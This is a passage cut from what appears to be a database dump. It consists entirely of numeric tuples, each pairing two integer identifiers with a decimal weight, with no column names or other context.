7,1546670,0.28),(4917,1546670,0.28),(4837,1546670,0.68),(4614,1546671,1.02669),(4614,1546672,1.07331),(4614,1546673,0.42),(4614,1546674,1.14331),(4614,1546675,1.37669),(4614,1546676,1.00331),(4614,1546677,1.00331),(4614,1546678,1.00331),(4614,1546679,0.88669),(4614,1546680,1.00331),(4614,1546681,0.93331),(4614,1546682,1.28331),(4614,1546683,0.95669),(4614,1546684,1.07331),(4614,1546685,0.88669),(4614,1546686,0.95669),(4614,1546687,0.98),(4614,1546688,1.07331),(4614,1546689,0.37331),(4614,1546690,1.00331),(4614,1546691,1.07331),(4614,1546692,0.37331),(4614,1546693,1.00331),(4614,1546694,1.07331),(4614,1546695,0.51331),(4614,1546696,1.21331),(4614,1546697,1.4),(4614,1546698,0.51331),(4614,1546699,1.00331),(4614,1546700,1.19),(4614,1546701,0.23331),(4617,1546701,0.23331),(4940,1546701,0.23331),(4614,1546702,1.02669),(4614,1546703,1.12),(4614,1546704,0.23331),(4669,1546704,0.23331),(4693,1546704,0.23331),(4734,1546704,0.23331),(4741,1546704,0.23331),(4803,1546704,0.23331),(4849,1546704,0.23331),(4940,1546704,0.23331),(4625,1546704,0.46662),(4909,1546704,0.69993),(4927,1546704,0.79992),(4614,1546705,1.09669),(4614,1546706,1.37669),(4614,1546707,0.98),(4614,1546708,1.23669),(4614,1547112,0.32669),(4614,1547113,0.91),(4614,1547114,1.12),(4614,1547115,0.56),(4614,1547116,1.23669),(4614,1547117,1.37669),(4625,1547118,0.14),(4761,1547118,0.14),(4777,1547118,0.14),(4927,1547118,0.14),(4614,1547118,0.28),(4653,1547118,0.34),(4735,1547118,0.34),(4710,1547118,0.42),(4917,1547118,0.42),(4721,1547118,0.7),(4734,1547118,0.7),(4614,1547119,0.95669),(4777,1547119,0.95669),(4614,1547120,1.02669),(4777,1547120,1.02669),(4614,1547121,1.00331),(4614,1547122,1.09669),(4616,1547695,0.93331),(4616,1547696,1.14331),(4616,1547891,1.05),(4616,1547892,0.56),(4616,1547893,1.23669),(4616,1547894,1.4),(4616,1547895,1.05),(4616,1547896,1.23669),(4616,1547897,1.23669),(4616,1547898,1.28331),(4616,1547899,1.37669),(4617,1548206,0.88669),(4617,1548207,1.19),(4617,1548208,0.21),(4625,1548208,0.21),(4617,1548209,0.93331),(4625,1548209,0.93331),(4617,1548210,0.98),(4617,1548342,0.98),(4617,1548343,1.05),(4617,1548344,1.14331),(4617,1548345,1.21331),(4617,1548346,1.07331),(4617,1548347,1.21331),(4617,1548348,1.05),(4617,1548349,1.4),(4617,1548350,1.16669),(4617,1548351,1.12),(4617,1548352,1.4),(4617,1548485,0.23331),(4617,1548486,1.05),(4617,1548487,1.23669),(4624,1554236,0.23331),(4626,1554236,0.46662),(4624,1554237,0.95669),(4624,1554238,1.14331),(4624,1554239,0.23331),(4798,1554239,0.69993),(4624,1554240,0.93331),(4798,1554240,0.93331),(4624,1554241,0.98),(4624,1554242,0.81669),(4624,1554243,0.88669),(4624,1554244,0.37331),(4624,1554245,1.21331),(4624,1554246,1.30669),(4624,1554247,0.28),(4624,1554248,1.05),(4624,1554249,1.4),(4624,1554250,0.28),(4624,1554251,0.93331),(4624,1554252,1.00331),(4624,1554253,0.23331),(4624,1554254,0.91),(4624,1554255,1.19),(4624,1554256,2.77661),(4624,1554257,1.68),(4624,1554258,1.07331),(4624,1554259,1.12),(4624,1554260,1.09669),(4624,1554261,1.14331),(4624,1554262,1.21331),(4624,1554263,1.26),(4624,1554264,1.82007),(4624,1554265,1.37669),(4624,1554266,1.4),(4624,1554267,1.4),(4624,1554268,1.4),(4624,1554269,1.28331),(4624,1554270,1.33),(4624,1554271,1.21338),(4624,1554272,1.21331),(4624,1554273,1.28331),(4624,1554274,1.23669),(4624,1554275,1.4),(4624,1554276,0.37331),(4624,1554277,1.09669),(4624,1554278,1.4),(4624,1554279,0.42),(4624,1554280,1.07331),(4624,1554281,1.35331),(4624,1554282,0.65331),(4624,1554283,1.28331),(4624,1554284,1.4),(4624,1554285,0.7),(4624,1554286,1.4),(4624,1554287,1.4),(4625,1554871,1.28331),(4625,1555140,0.14),(4625,1555141,1.00331),(4625,1555142,1.14331),(4625,1555143,1.00331),(4626,1555143,1.00331),(4625,1555144,1.21331),(4626,1555144,1.21331),(4625,1555145,0.95669),(4625,1555146,1.12),(4625,1555147,0.65331),(4625,1555148,1.23669),(4625,1555149,1.4),(4625,1555150,0.42),(4625,1555151,1.05),(4625,1555152,1.14331),(4625,1555153,0.37331),(4626,1555153,0.37331),(4625,1555154,1.02669),(4625,1555155,1.21331),(4625,1555156,0.23331),(4917,1555156,0.23331),(4625,1555157,0.91),(4625,1555158,0.95669),(4625,1555159,0.23331),(4625,1555160,0.95669),(4625,1555161,1.14331),(4625,1555162,1.00331),(4625,1555163,1.12),(4625,1555164,1.00331),(4625,1555165,1.05),(4625,1555166,1.05),(4625,1555167,1.19),(4625,1555168,0.32669),(4625,1555169,0.91),(4625,1555170,1.07331),(4625,1555462,0.28),(4625,1555463,1.05),(4625,1555464,1.21331),(4625,1555465,1.05),(4625,1555466,1.12),(4626,1555951,0.35),(4626,1555952,0.88669),(4626,1555953,1.12),(4626,1556495,0.23331),(4626,1556496,1.00331),(4626,1556497,1.14331),(4626,1556498,1.07331),(4626,1556499,1.21331),(4626,1556500,1.07331),(4626,1556501,1.16669),(4626,1556502,0.98007),(4626,1556503,1.00331),(4626,1556504,1.28331),(4626,1556505,2.19338),(4626,1556506,2.52),(4626,1556507,3.5),(4626,1556508,6.53345),(4626,1556509,6.88345),(4626,1556510,0.32669),(4626,1556511,1.00331),(4626,1556512,1.07331),(4626,1556513,0.46669),(4626,1556514,1.19),(4626,1556515,1.4),(4626,1556516,0.65331),(4626,1556517,1.37669),(4626,1556518,1.4),(4626,1556519,0.91),(4626,1556520,1.19),(4626,1556521,1.49352),(4626,1556522,4.55),(4626,1556523,1.05),(4626,1556524,1.05),(4626,1556525,1.09669),(4626,1556526,2.24),(4626,1556527,2.73),(4626,1556528,1.09669),(4626,1556529,2.14662),(4626,1556530,0.37331),(4626,1556531,1.19),(4626,1556532,1.26),(4626,1556533,4.01324),(4626,1556534,4.29324),(4626,1556535,2.00662),(4626,1556536,2.14662),(4626,1556537,0.93331),(4626,1556538,1.14331),(4626,1556539,2.73),(4626,1556540,3.36),(4626,1556541,0.98),(4626,1556542,1.19),(4626,1556543,3.92),(4626,1556544,4.2),(4626,1556545,0.51331),(4626,1556546,1.02669),(4626,1556547,1.07331),(4626,1556548,1.02669),(4626,1556549,1.35331),(4626,1556550,0.7),(4626,1556551,1.09669),(4626,1556552,1.4),(4626,1556553,0.28),(4626,1556554,0.88669),(4626,1556555,1.02669),(4626,1556556,0.46669),(4626,1556557,1.28331),(4626,1556558,1.4),(4626,1556559,0.46669),(4626,1556560,1.26),(4626,1556561,1.35331),(4626,1556909,0.23331),(4626,1556910,0.98),(4626,1556911,1.05),(4626,1556912,0.56),(4626,1556913,1.96),(4626,1556914,2.1),(4626,1556915,0.18669),(4626,1556916,0.91),(4626,1556917,1.16669),(4626,1556918,0.14),(4626,1556919,0.95669),(4626,1556920,1.00331),(4626,1556921,0.18669),(4938,1556921,0.18669),(4626,1556922,1.05),(4626,1556923,1.14331),(4635,1558534,0.14),(4635,1558535,0.91),(4635,1558536,1.07331),(4669,1559045,1.09669),(4741,1559045,1.09669),(4849,1559045,1.09669),(4909,1559045,2.19338),(4669,1559046,1.16669),(4741,1559046,1.16669),(4669,1559047,0.68),(4741,1559047,0.68),(4806,1559047,0.68),(4851,1559047,0.68),(4857,1559047,0.96),(4669,1559048,2.49339),(4741,1559048,2.49339),(4806,1559048,2.49339),(4851,1559048,2.49339),(4653,1560675,0.79339),(4653,1560676,2.49339),(4653,1560677,2.66339),(4653,1560678,0.79339),(4664,1560678,0.79339),(4734,1560678,0.98007),(4732,1560678,1.44677),(4761,1560678,1.44677),(4653,1560679,2.66339),(4653,1560680,3.17339),(4734,1560681,0.23331),(4777,1560681,0.23331),(4653,1560681,0.56661),(4653,1560682,2.32339),(4653,1560683,2.72),(4653,1560712,2.21),(4653,1560713,2.55),(4653,1560714,0.45339),(4653,1560715,2.60661),(4653,1560716,3.23),(4658,1562891,0.98),(4658,1562892,1.05),(4658,1562893,0.21),(4658,1562894,0.91),(4658,1562895,0.95669),(4658,1562896,0.14),(4658,1562897,0.84),(4658,1562898,0.98),(4658,1562899,0.21),(4658,1562900,0.91),(4658,1562901,0.95669),(4658,1563030,1.12),(4658,1563031,3.82676),(4658,1563032,1.00331),(4658,1563033,3.08007),(4761,1563034,0.28),(4658,1563034,0.56),(4761,1563035,0.95669),(4658,1563035,1.91338),(4658,1563036,2.05338),(4658,1563037,0.42),(4761,1563037,0.84),(4658,1563038,1.07331),(4761,1563038,1.07331),(4658,1563039,1.19),(4761,1563039,1.19),(4664,1563641,2.38),(4734,1563641,2.94),(4732,1563641,3.36),(4761,1563641,4.34),(4664,1563642,1.13339),(4734,1563642,1.40007),(4732,1563642,2.06677),(4761,1563642,2.06677),(4734,1563643,1.12),(4664,1563643,2.72),(4732,1563643,4.96),(4761,1563643,4.96),(4734,1563644,1.23669),(4664,1563644,3.00339),(4732,1563644,4.24008),(4761,1563644,5.47677),(4734,1564295,0.74662),(4761,1564301,1.53993),(4761,1564302,1.12),(4761,1564446,0.18669),(4803,1564446,0.18669),(4669,1564737,0.91),(4669,1564738,1.05),(4669,1564749,2.77661),(4669,1564750,1.00331),(4669,1564751,1.12),(4761,1564880,0.32669),(4673,1564880,0.79339),(4673,1564881,2.77661),(4673,1564882,3.11661),(4673,1564883,0.79339),(4953,1564883,0.79339),(4761,1564884,0.93338),(4673,1564884,1.13339),(4762,1564884,10.7339),(4673,1564885,2.72),(4673,1564886,3.4),(4673,1564887,1.02),(4673,1564888,2.66339),(4673,1564889,0.56661),(4673,1564890,2.60661),(4673,1564891,3.17339),(4734,1565388,0.28),(4678,1565388,0.68),(4734,1565389,0.95669),(4678,1565389,2.32339),(4678,1565390,3.17339),(4678,1565391,1.02),(4678,1565392,2.60661),(4678,1565393,2.89),(4678,1565394,0.79339),(4678,1565395,2.21),(4678,1565396,2.77661),(4721,1568280,0.23331),(4732,1568280,0.23331),(4761,1568280,0.46662),(4734,1568280,0.56661),(4777,1568613,0.09331),(4849,1568613,0.09331),(4927,1568613,0.09331),(4938,1568613,0.09331),(4940,1568613,0.09331),(4917,1568613,0.18662),(4687,1568613,0.22661),(4721,1568613,0.27993),(4734,1568613,0.27993),(4803,1568613,0.31992),(4687,1568614,2.38),(4687,1568615,2.94661),(4693,1569338,1.07331),(4693,1569339,1.33),(4693,1569340,0.18669),(4693,1569341,0.93331),(4693,1569342,1.16669),(4693,1569343,0.88669),(4693,1569344,1.14331),(4710,1592426,0.91),(4710,1592427,1.12),(4710,1592428,0.09331),(4734,1592428,0.37324),(4710,1592429,1.00331),(4710,1592430,1.21331),(4710,1592431,0.37331),(4710,1592432,1.16669),(4710,1592433,1.30669),(4710,1592434,0.65331),(4710,1592435,1.33),(4710,1592436,1.4),(4710,1592764,0.81669),(4710,1592765,0.95669),(4710,1592766,1.02669),(4710,1592767,1.16669),(4710,1592768,0.98),(4710,1592769,1.23669),(4710,1592770,0.18669),(4721,1592770,0.18669),(4734,1592770,0.18669),(4849,1592770,0.18669),(4927,1592770,0.18669),(4777,1592770,0.37338),(4938,1592770,0.37338),(4710,1592771,1.07331),(4710,1592772,1.33),(4721,1603438,0.46662),(4956,1603438,0.56661),(4721,1603439,1.02669),(4721,1603440,1.14331),(4721,1603441,0.23331),(4734,1603441,0.23331),(4721,1603442,0.88669),(4721,1603443,1.02669),(4721,1603444,0.23331),(4734,1603444,0.23331),(4721,1603445,1.02669),(4721,1603446,1.16669),(4721,1603447,0.14),(4940,1603447,0.14),(4721,1603448,0.91),(4721,1603449,1.19),(4721,1603450,0.18669),(4734,1603450,0.18669),(4721,1603451,0.86331),(4721,1603452,1.00331),(4721,1603453,0.79992),(4721,1603454,0.86331),(4721,1603455,1.07331),(4721,1603456,0.88669),(4721,1603457,1.09669),(4721,1603458,0.46662),(4721,1603459,0.93331),(4721,1603460,1.14331),(4721,1603461,0.88669),(4721,1603462,1.00331),(4721,1603463,0.56),(4721,1603464,0.95669),(4721,1603465,1.02669),(4721,1603466,0.91),(4721,1603467,1.05),(4721,1603468,0.32669),(4721,1603469,1.16669),(4721,1603470,1.30669),(4721,1603471,0.37331),(4721,1603472,0.95669),(4721,1603473,1.09669),(4721,1603474,0.74662),(4721,1603475,0.95669),(4721,1603476,1.12),(4721,1603477,0.93331),(4721,1603478,1.26),(4721,1603479,0.32669),(4721,1603480,0.93331),(4721,1603481,1.16669),(4721,1603482,0.28),(4721,1603483,0.95669),(4721,1603484,1.02669),(4721,1604101,1.00331),(4721,1604102,1.07331),(4721,1604103,0.98),(4721,1604104,1.19),(4721,1604105,0.88669),(4721,1604106,1.16669),(4721,1604107,0.91),(4721,1604108,1.02669),(4721,1604109,0.98),(4721,1604110,1.02669),(4721,1604111,0.93331),(4721,1604112,1.05),(4721,1604113,0.95669),(4721,1604114,1.09669),(4721,1604115,1.02669),(4721,1604116,1.07331),(4721,1604117,0.18669),(4734,1604117,0.37338),(4721,1604118,1.07331),(4721,1604119,1.26),(4721,1604120,1.07331),(4721,1604121,1.12),(4721,1604122,0.23331),(4721,1604123,0.98),(4721,1604124,1.21331),(4721,1604125,0.14),(4734,1604125,0.14),(4721,1604126,0.93331),(4721,1604127,1.19),(4734,1605083,0.23331),(4851,1605083,0.23331),(4852,1605083,0.23331),(4857,1605083,0.23331),(4955,1605083,0.23331),(4755,1605083,0.39996),(4762,1605083,0.46662),(4727,1605083,0.56661),(4778,1605083,0.56661),(4956,1605083,0.56661),(4761,1605083,6.06606),(4727,1605084,2.43661),(4727,1605085,2.89),(4727,1605086,1.02),(4764,1605086,1.02),(4732,1613319,0.77),(4732,1613320,0.91),(4732,1613321,0.93331),(4732,1613322,1.09669),(4732,1613323,0.95669),(4732,1613324,1.14331),(4732,1613325,0.95669),(4732,1613326,1.12),(4732,1613327,0.95669),(4732,1613328,1.19),(4732,1613531,1.14331),(4732,1613532,1.30669),(4732,1613533,1.07331),(4732,1613534,2.55),(4732,1613535,0.23331),(4732,1613536,0.98),(4732,1613537,1.21331),(4732,1613538,0.32669),(4761,1613538,0.32669),(4732,1613539,0.98),(4761,1613539,0.98),(4732,1613540,1.21331),(4761,1613540,1.21331),(4732,1613541,1.4),(4732,1613542,1.07331),(4761,1613542,1.07331),(4732,1613543,1.12),(4732,1613544,0.23331),(4732,1613545,1.23669),(4732,1613546,1.28331),(4732,1613547,0.28),(4732,1613548,1.02669),(4732,1613549,1.07331),(4732,1613550,0.37331),(4732,1613551,1.05),(4732,1613552,1.30669),(4732,1613553,0.32669),(4761,1613553,0.32669),(4732,1613554,0.98),(4761,1613554,0.98),(4732,1613555,1.23669),(4761,1613555,1.23669),(4732,1613556,0.28),(4761,1613556,0.28),(4762,1613556,0.56),(4732,1613557,1.07331),(4732,1613558,1.12),(4761,1613559,0.93338),(4762,1613559,0.93338),(4732,1613559,1.86676),(4732,1613560,0.98),(4732,1613561,1.16669),(4732,1613562,0.98),(4732,1613563,1.26),(4732,1613564,0.98),(4732,1613565,1.21331),(4732,1613566,0.98),(4732,1613567,1.19),(4734,1616725,0.51331),(4803,1616725,0.51331),(4734,1616726,1.09669),(4803,1616726,1.09669),(4734,1616727,1.4),(4734,1616728,0.37331),(4734,1616729,1.14331),(4734,1616730,1.19),(4734,1616731,0.93324),(4734,1616732,1.30669),(4734,1616733,1.4),(4734,1616734,0.95669),(4734,1616735,1.14331),(4734,1616736,0.91),(4734,1616737,1.16669),(4734,1616738,0.95669),(4734,1616739,1.14331),(4734,1616740,0.28),(4734,1616741,0.93331),(4734,1616742,1.07331),(4734,1616743,0.98),(4734,1616744,1.07331),(4734,1616745,0.98),(4734,1616746,1.21331),(4734,1616747,0.32669),(4762,1616747,0.32669),(4761,1616747,0.65338),(4734,1616748,1.02669),(4734,1616749,1.14331),(4734,1616750,1.12),(4734,1616751,1.16669),(4734,1616752,1.07331),(4734,1616753,1.23669),(4734,1616754,0.84),(4734,1616755,2.52),(4734,1616756,1.4),(4734,1616757,1.37669),(4734,1616758,1.02669),(4734,1616759,1.37669),(4734,1616760,0.32669),(4734,1616761,0.98),(4734,1616762,1.02669),(4734,1616763,1.14331),(4734,1616764,1.14331),(4734,1616765,1.09669),(4734,1616766,1.00331),(4734,1616767,0.95669),(4734,1616768,1.19),(4734,1616769,0.18669),(4734,1616770,0.95669),(4734,1616771,1.00331),(4734,1616772,0.91),(4734,1616773,1.07331),(4734,1616774,1.00331),(4734,1616775,1.14331),(4734,1616776,1.60008),(4734,1616777,3.84),(4734,1616778,1.16669),(4734,1616779,3.34339),(4734,1616780,1.12),(4734,1616781,1.19),(4734,1616782,1.21331),(4734,1616783,1.37669),(4734,1616784,0.23331),(4734,1616785,1.02669),(4734,1616786,1.21331),(4734,1616787,0.51331),(4734,1616788,1.05),(4734,1616789,1.09669),(4734,1616790,0.23331),(4734,1616791,1.07331),(4734,1616792,1.21331),(4734,1616793,2.60661),(4734,1616794,2.77661),(4734,1616795,0.28),(4734,1616796,0.98),(4734,1616797,1.21331),(4734,1616798,0.14),(4734,1616799,0.93331),(4734,1616800,1.07331),(4734,1616801,0.95669),(4734,1616802,1.14331),(4734,1616803,0.42),(4734,1616804,1.26),(4734,1616805,1.4),(4734,1616806,0.56007),(4734,1616807,0.95669),(4734,1616808,1.00331),(4734,1616809,0.95669),(4734,1616810,1.07331),(4734,1616811,1.00331),(4734,1616812,1.14331),(4734,1616813,0.42),(4734,1616814,1.07331),(4734,1616815,1.14331),(4734,1616816,0.93331),(4734,1616817,1.19),(4734,1616818,0.88669),(4734,1616819,1.02669),(4734,1616820,1.63338),(4734,1616821,1.07331),(4734,1616822,1.05),(4734,1616823,0.28),(4734,1616824,0.88669),(4734,1616825,1.07331),(4734,1616826,0.18669),(4803,1616826,0.18669),(4734,1616827,1.02669),(4734,1616828,1.23669),(4734,1616829,0.93331),(4734,1616830,1.09669),(4734,1616831,0.7),(4734,1616832,1.37669),(4734,1616833,1.4),(4734,1616834,0.32669),(4734,1616835,1.12),(4734,1616836,1.26),(4734,1617719,0.14007),(4734,1617720,0.77),(4734,1617721,0.88669),(4734,1617722,0.84),(4734,1617723,1.00331),(4734,1617724,0.79331),(4734,1617725,0.95669),(4734,1617726,0.95669),(4734,1617727,1.21331),(4734,1617728,0.91),(4734,1617729,1.05),(4734,1617730,1.16669),(4734,1617731,1.37669),(4734,1617732,0.93331),(4734,1617733,1.21331),(4734,1617734,1.05),(4734,1617735,1.26),(4734,1617736,0.88669),(4734,1617737,1.12),(4734,1617738,0.84),(4734,1617739,1.09669),(4734,1617740,1.05),(4734,1617741,1.21331),(4734,1617742,0.98),(4734,1617743,1.09669),(4734,1617744,0.88669),(4734,1617745,1.16669),(4734,1617746,0.28),(4734,1617747,1.00331),(4734,1617748,1.05),(4734,1617749,1.07331),(4734,1617750,1.28331),(4734,1617751,0.28),(4734,1617752,1.05),(4734,1617753,1.19),(4734,1617754,0.23331),(4761,1617754,0.23331),(4734,1617755,0.93331),(4734,1617756,1.09669),(4734,1617757,1.07331),(4734,1617758,1.26),(4927,1617759,0.18669),(4940,1617759,0.45339),(4734,1617759,0.56007),(4734,1617760,0.91),(4734,1617761,1.12),(4734,1617762,0.98),(4734,1617763,1.12),(4734,1617764,1.00331),(4734,1617765,1.16669),(4735,1617973,2.21),(4735,1617974,2.60661),(4736,1618056,0.51331),(4940,1618056,0.51331),(4736,1618057,1.09669),(4940,1618057,1.09669),(4736,1618058,1.33),(4940,1618058,1.33),(4851,1620569,0.86331),(4852,1620569,0.86331),(4857,1620569,0.86331),(4955,1620569,0.86331),(4762,1620569,1.72662),(4761,1620569,21.5828),(4762,1620572,23.6128),(4761,1620572,36.4925),(4762,1620573,2.24),(4761,1620573,30.24),(4761,1620574,6.72),(4762,1620574,14.56),(4762,1620576,1.14331),(4761,1620576,2.28662),(4762,1620577,1.26),(4761,1620577,2.52),(4761,1620581,0.46669),(4762,1620581,0.93338),(4761,1620592,1.02669),(4762,1620592,21.5605),(4761,1620593,1.30669),(4762,1620593,27.4405),(4761,1620603,1.02662),(4762,1620603,1.53993),(4762,1621036,0.18669),(4761,1621036,0.37338),(4762,1621037,1.00331),(4761,1621037,2.00662),(4741,1621229,2.89),(4741,1621230,1.07331),(4741,1621231,1.19),(4749,1623513,0.32669),(4851,1623513,0.32669),(4749,1623514,1.00331),(4851,1623514,1.00331),(4749,1623515,1.05),(4753,1623645,1.00331),(4753,1623646,1.05),(4759,1623830,0.68),(4761,1626192,1.72662),(4761,1626193,1.09669),(4761,1626194,0.95669),(4761,1626195,1.54),(4761,1626196,1.00331),(4761,1626197,1.02669),(4761,1626198,0.95669),(4761,1626199,1.09669),(4761,1626200,0.98),(4761,1626201,1.14331),(4761,1626202,2.87007),(4761,1626203,3.36),(4761,1626204,0.93331),(4761,1626205,1.09669),(4761,1626206,0.35),(4761,1626207,0.86331),(4761,1626208,0.91),(4761,1626209,0.7),(4761,1626210,0.86331),(4761,1626211,0.91),(4761,1626212,0.86331),(4761,1626213,0.91),(4761,1626214,0.28),(4761,1626215,0.86331),(4761,1626216,1.09669),(4761,1626217,0.14),(4761,1626218,0.88669),(4761,1626219,1.00331),(4761,1626220,0.21),(4761,1626221,0.81669),(4761,1626222,1.05),(4761,1626223,0.35),(4761,1626224,1.05),(4761,1626225,1.21331),(4761,1626226,0.28),(4761,1626227,1.77338),(4761,1626228,2.00662),(4761,1626802,0.91),(4761,1626803,1.19),(4761,1626804,0.95669),(4761,1626805,1.28331),(4761,1626806,29.75),(4761,1626807,1.16669),(4761,1626808,1.11993),(4761,1626809,3.00993),(4761,1626810,1.07331),(4761,1626811,1.14331),(4761,1626812,1.09669),(4761,1626813,0.32669),(4761,1626814,1.14331),(4761,1626815,1.4),(4761,1626816,1.19),(4761,1626817,1.02669),(4761,1626818,1.16669),(4761,1626819,1.21331),(4761,1626820,1.16669),(4761,1626821,0.37331),(4761,1626822,1.05),(4761,1626823,1.19),(4761,1626824,0.37331),(4761,1626825,0.98),(4761,1626826,1.02669),(4761,1626827,1.09669),(4761,1626828,1.30669),(4761,1626829,1.12),(4761,1626830,1.33),(4761,1626831,28.5827),(4761,1626832,30.9172),(4761,1626833,0.51331),(4761,1626834,1.16669),(4761,1626835,1.28331),(4761,1626836,1.09669),(4761,1626837,1.30669),(4761,1626838,0.42),(4761,1626839,1.09669),(4761,1626840,1.35331),(4761,1626841,1.19),(4761,1626842,1.4),(4761,1626843,1.02669),(4761,1626844,1.21331),(4761,1626845,1.19),(4761,1626846,1.30669),(4761,1626847,1.35331),(4761,1626848,0.37331),(4761,1626849,1.12),(4761,1626850,1.28331),(4761,1626851,1.02669),(4761,1626852,1.28331),(4761,1626853,1.33),(4761,1626854,1.05),(4761,1626855,1.30669),(4761,1626856,2.38),(4761,1626857,2.75338),(4761,1626858,2.42662),(4761,1626859,2.8),(4761,1626860,0.46669),(4761,1626861,1.19),(4761,1626862,1.37669),(4761,1626863,0.46669),(4761,1626864,1.19),(4761,1626865,1.37669),(4761,1627465,1.02669),(4761,1627466,1.09669),(4761,1627467,1.05),(4761,1627468,1.26),(4761,1627469,2.52),(4761,1627470,0.98),(4761,1627471,1.21331),(4762,1628027,1.02669),(4762,1628028,1.21331),(4762,1628029,0.91),(4762,1628030,1.09669),(4762,1628031,0.56),(4762,1628032,0.88669),(4762,1628033,1.09669),(4762,1628034,1.02669),(4762,1628035,1.19),(4762,1628327,0.86331),(4762,1628328,1.12),(4762,1628329,1.14331),(4762,1628330,1.12),(4762,1628331,8.33),(4762,1628332,0.32669),(4762,1628333,0.98),(4762,1628334,1.12),(4762,1628335,0.98),(4762,1628336,1.02669),(4762,1628337,1.09669),(4762,1628338,1.30669),(4762,1628339,1.09669),(4762,1628340,1.19),(4762,1628341,1.07331),(4762,1628342,1.16669),(4762,1628343,2.00662),(4762,1628344,2.19338),(4762,1628345,0.7),(4762,1628346,1.30669),(4762,1628347,1.4),(4762,1628348,1.16669),(4762,1628349,1.4),(4762,1628350,1.12),(4762,1628351,1.35331),(4762,1628352,2.33338),(4762,1628353,2.66),(4762,1628354,3.57),(4762,1628355,4.05993),(4762,1628356,0.65338),(4762,1628357,1.07331),(4762,1628358,1.4),(4762,1628359,1.14331),(4762,1628360,1.37669),(4762,1628361,0.42),(4762,1628362,1.07331),(4762,1628363,1.35331),(4762,1628695,1.23669),(4762,1628696,0.37331),(4762,1628697,1.12),(4762,1628698,1.33),(4764,1629060,2.49339),(4764,1629061,3.06),(4777,1629568,0.14),(4777,1629569,0.88669),(4777,1629570,1.07331),(4777,1629571,1.00331),(4777,1629572,1.26),(4777,1629573,0.14),(4777,1629574,0.93331),(4777,1629575,1.12),(4777,1629576,0.14),(4777,1629577,0.88669),(4777,1629578,1.00331),(4777,1629579,0.46669),(4777,1629580,1.07331),(4777,1629581,1.23669),(4777,1629815,0.79331),(4777,1629816,1.00331),(4777,1629817,0.98),(4777,1629818,1.05),(4777,1629819,1.00331),(4777,1629820,1.09669),(4778,1629865,2.66339),(4778,1629866,3.06),(4798,1643139,0.21),(4798,1643140,0.88669),(4798,1643141,0.93331),(4798,1643142,0.32669),(4798,1643143,0.95669),(4798,1643144,1.19),(4798,1643145,0.84),(4798,1643146,1.00331),(4798,1643457,0.09331),(4798,1643458,0.79331),(4798,1643459,1.07331),(4798,1643460,0.28),(4798,1643461,1.14331),(4798,1643462,1.33),(4798,1643463,0.28),(4798,1643464,0.93331),(4798,1643465,0.98),(4798,1643466,0.86331),(4798,1643467,0.95669),(4798,1643468,0.91),(4798,1643469,1.02669),(4798,1643470,1.02669),(4798,1643471,0.37331),(4798,1643472,1.09669),(4798,1643473,1.33),(4798,1643474,0.23331),(4798,1643475,1.05),(4798,1643476,1.14331),(4798,1643477,0.46669),(4798,1643478,1.14331),(4798,1643479,1.35331),(4798,1643480,0.14),(4798,1643481,0.93331),(4798,1643482,1.21331),(4798,1643483,0.81669),(4798,1643484,0.86331),(4798,1643485,2.45007),(4798,1643486,2.66007),(4798,1643487,0.95669),(4798,1643488,1.05),(4798,1643489,1.16669),(4798,1643490,1.37669),(4798,1643491,0.60669),(4798,1643492,1.05),(4798,1643493,1.28331),(4803,1645033,1.35331),(4803,1645034,0.98),(4803,1645035,1.16669),(4803,1645036,1.12),(4803,1645037,1.4),(4803,1645038,1.00331),(4803,1645039,1.16669),(4803,1645139,3.19992),(4803,1645140,4.32),(4803,1645141,1.00331),(4803,1645142,1.12),(4806,1645288,2.83339),(4808,1645362,0.68),(4808,1645363,2.72),(4808,1645364,3.06),(4837,1646522,2.32339),(4837,1646523,2.60661),(4849,1647156,0.46662),(4849,1647157,1.77338),(4849,1647158,1.96),(4849,1647159,0.32669),(4849,1647160,0.93331),(4849,1647161,1.07331),(4849,1647162,0.23331),(4849,1647163,0.98),(4849,1647164,1.07331),(4849,1647165,1.14331),(4909,1647165,1.14331),(4849,1647436,0.91),(4849,1647437,1.00331),(4849,1647438,0.95669),(4849,1647439,1.14331),(4850,1647955,2.38),(4850,1647956,2.66339),(4851,1647993,1.16669),(4852,1647993,1.16669),(4851,1647994,1.12),(4852,1647994,1.12),(4851,1647995,1.30669),(4852,1647995,1.30669),(4851,1647996,1.19),(4851,1647997,2.89),(4857,1648310,1.14331),(4857,1648311,1.09669),(4857,1648312,1.28331),(4857,1648313,0.46669),(4857,1648314,1.14331),(4857,1648315,1.19),(4857,1648316,0.18669),(4857,1648317,1.05),(4857,1648318,1.26),(4857,1648319,1.09669),(4857,1648320,1.28331),(4909,1672180,0.93331),(4909,1672181,0.98),(4909,1672182,0.98),(4909,1672183,1.14331),(4909,1672305,0.18669),(4909,1672306,0.84),(4909,1672307,1.00331),(4909,1672308,0.98),(4909,1672309,1.19),(4909,1672310,0.84),(4909,1672311,1.02669),(4909,1672312,0.98),(4909,1672313,1.14331),(4909,1672314,2.55),(4909,1672315,3.23),(4909,1672316,0.23331),(4909,1672317,0.86331),(4909,1672318,0.93331),(4909,1672319,0.88669),(4909,1672320,1.05),(4909,1672321,1.26),(4917,1679123,0.46669),(4917,1679124,1.12),(4917,1679125,1.28331),(4917,1679126,0.51331),(4917,1679127,1.16669),(4917,1679128,1.4),(4917,1679129,1.05),(4917,1679130,1.12),(4917,1679131,1.07331),(4917,1679132,1.37669),(4917,1679133,1.00331),(4917,1679134,1.07331),(4917,1679135,0.56),(4917,1679136,0.88669),(4917,1679137,1.14331),(4917,1679138,1.05),(4917,1679139,1.35331),(4917,1679140,0.32669),(4917,1679141,1.07331),(4917,1679142,1.37669),(4917,1679143,0.88669),(4917,1679144,1.16669),(4917,1679383,0.65338),(4917,1679384,1.02669),(4917,1679385,1.09669),(4917,1679386,1.19),(4917,1679387,1.23669),(4917,1679388,0.32669),(4917,1679389,1.00331),(4917,1679390,1.05),(4917,1679391,0.81669),(4917,1679392,1.00331),(4917,1679393,0.91),(4917,1679394,1.12),(4917,1679395,0.91),(4917,1679396,1.21331),(4917,1679397,0.98),(4917,1679398,1.02669),(4917,1679399,1.07331),(4917,1679400,1.14331),(4927,1682707,0.84),(4927,1682708,0.91),(4927,1683008,0.42),(4927,1683009,1.07331),(4927,1683010,1.21331),(4927,1683011,3.28008),(4927,1683012,2.66339),(4927,1683013,1.21331),(4927,1683252,0.91),(4927,1683253,0.98),(4927,1683254,0.93331),(4927,1683255,1.23669),(4927,1683256,0.95669),(4927,1683257,1.02669),(4927,1683258,0.84),(4927,1683259,0.91),(4935,1684027,0.68),(4935,1684028,2.32339),(4935,1684029,2.66339),(4938,1686331